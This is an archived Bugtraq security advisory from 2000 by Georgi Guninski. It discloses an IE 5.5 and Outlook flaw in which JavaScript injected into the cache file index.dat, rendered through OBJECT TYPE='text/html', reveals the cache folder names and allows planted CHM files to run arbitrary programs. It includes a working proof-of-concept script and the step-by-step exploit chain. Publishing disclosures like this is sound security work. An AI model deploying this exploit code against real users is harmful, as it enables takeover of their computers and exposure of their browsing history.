Bugtraq mailing list archives
OBJECT TYPE="text/html" may allow executing arbitrary programs in IE 5.5
From: Georgi Guninski <guninski () GUNINSKI COM>
Date: Thu, 23 Nov 2000 17:50:01 +0200
Georgi Guninski security advisory #29, 2000 OBJECT TYPE="text/html" may allow executing arbitrary programs in IE 5.5 Systems affected: IE 5.5 probably 5.x and Outlook/Outlook Express, have not tested Risk: High Date: 23 November 2000 Legal Notice: This Advisory is Copyright (c) 2000 Georgi Guninski. You may distribute it unmodified. You may not modify it and distribute it or distribute parts of it without the author's written permission. Disclaimer: The opinions expressed in this advisory and program are my own and not of any company. The usual standard disclaimer applies, especially the fact that Georgi Guninski is not liable for any damages caused by direct or indirect use of the information or functionality provided by this advisory or program. Georgi Guninski, bears no responsibility for content or misuse of this advisory or program or any derivatives thereof. Announcement: I have set up an experimental mailing list about client and web security - there you may learn faster about my discoveries and how to protect your clients. Check: http://www.guninski.com/mailinglist.html Description: Note: This is completely different issue from Advisory #28 "IE 5.x/Outlook allows executing arbitrary programs using .chm files and temporary internet files folder" though both use some common stuff. There is a security vulnerability in IE 5.5 (probably 5.x and Outlook) which allows executing arbitratrary programs using OBJECT TYPE="text/html" and parsing index.dat by revealing the location of temporary internet files folder. This may lead to taking full control over user's computer. Details: Backround: If one can inject a file on user's local disk and know its location it is possible to execute arbitrary programs in at least two ways: 1) window.showHelp("c:\\dir\\hostile.chm") 2) <OBJECT CLASSID="clsid:000000000-0000-0000-00000-000000000002" CODEBASE="C:\DIR\HOSTILE.EXE"> So the question arise how to inject a specified file on user's disk. A good way is to use the Temporary Internet Files Folder which contain cached documents and files. The problem with it is there are several subfolders with random names. But there is a special file "index.dat" which is something like a catalog or registry which contains all visited URLs and which is more important the names of the random folders in its beginning. It is locatated in C:/WINDOWS/Temporary Internet Files/Content.IE5/ under Win9x and in C:/Documents and Settings/USERNAME/Local Settings/Temporary Internet Files/Content.IE5/ under Win2K - so under Win2K the username of the current user must be known or guessed which makes things more difficult. It is possible to inject JavaScript in it by just doing: window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>") because this URL shall be written in it. So if it can be parsed by IE and the JavaScript be executed the names of the random folders will be known. But Microsoft tries to prevent parsing non-HTML files and they have issued a security bulletin in August: http://www.microsoft.com/technet/security/bulletin/MS00-055.asp But it is possible to parse (render) non-HTML files in the following way: <OBJECT TYPE="text/html" DATA="file://c:/file.dat"></OBJECT> So the exploit scenario is: 1) inject JavaScript in index.dat by window.open("http://somehost/index.html?<SCRIPT>JSCODE</SCRIPT>") The JavaScript is executed in index.dat and has access to its content, which allow to find the random directory names 2) parse/render index.dat by: <OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT> 3) After the Temporary internet Files Folders are known inject for example chm files by: <OBJECT DATA="chm1.chm" TYPE="text/html"></OBJECT> 4) Do window.showHelp("FOUNDRANDOMDIRECTORY\\chm1[1].chm"); The presense of the random temporary internet files folders in index.dat is very dangerous - it means that every Cross Frame Security vulnerability or vulnerability that reads local files may lead to executing arbitrary programs. This means that a lot of my previous vulnerabilities are much more serious that I have realized then. The code is: --------parsedat.html------------------------------------------------ This demo is for Windows 9x - you must modify the source for Win2K. You may need to wait a few minutes if you have slow computer. If you have Pentium 500 or better or use Win2K probably much less. It is expected a window with location "about:blank" to be opened containing index.dat - the file where the random names of temporary internet files directories are kept (they are random names in the beginning of the window) and the list of all visited URLs among other stuff. Once the temporary internet files directories are know it is possible to execute arbitrary programs thru cached files and showHelp() or OBJECT CODEBASE="...". If you don't see a window with location "about:blank" and content of index.dat close IE and visit the page again. <SCRIPT> b=window.open("http://www.guninski.com/empty2.html?<SCRIPT>a=window.open();a.document.body.innerHTML=escape(document.body.innerHTML)</"+"SCRIPT>"); s='<OBJECT DATA="file://C:/WINDOWS/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>'; //s='<OBJECT DATA="file://C:/Documents and Settings/Administrator/Local Settings/Temporary Internet Files/Content.IE5/index.dat" TYPE="text/html" WIDTH=200 HEIGHT=200></OBJECT>'; // ^^^ This is for Win2K ------------you must change "Administrator" to the actual user name setTimeout("document.writeln(s)",5000); </SCRIPT> --------------------------------------------------------------------- Workaround: Disable Active Scripting and move the location of the Temporary Internet Files Folder to unpredicatable location Demonstration which opens index.dat which contains the Temporary Internet Files Folders and the list of all visited URLs is available: http://www.guninski.com/parsedat.html Vendor status: Microsoft was contacted on 15 November 2000. Check my experimental mailing list at: http://www.guninski.com/mailinglist.html Regards, Georgi Guninski http://www.guninski.com
Current thread:
- OBJECT TYPE="text/html" may allow executing arbitrary programs in IE 5.5 Georgi Guninski (Nov 24)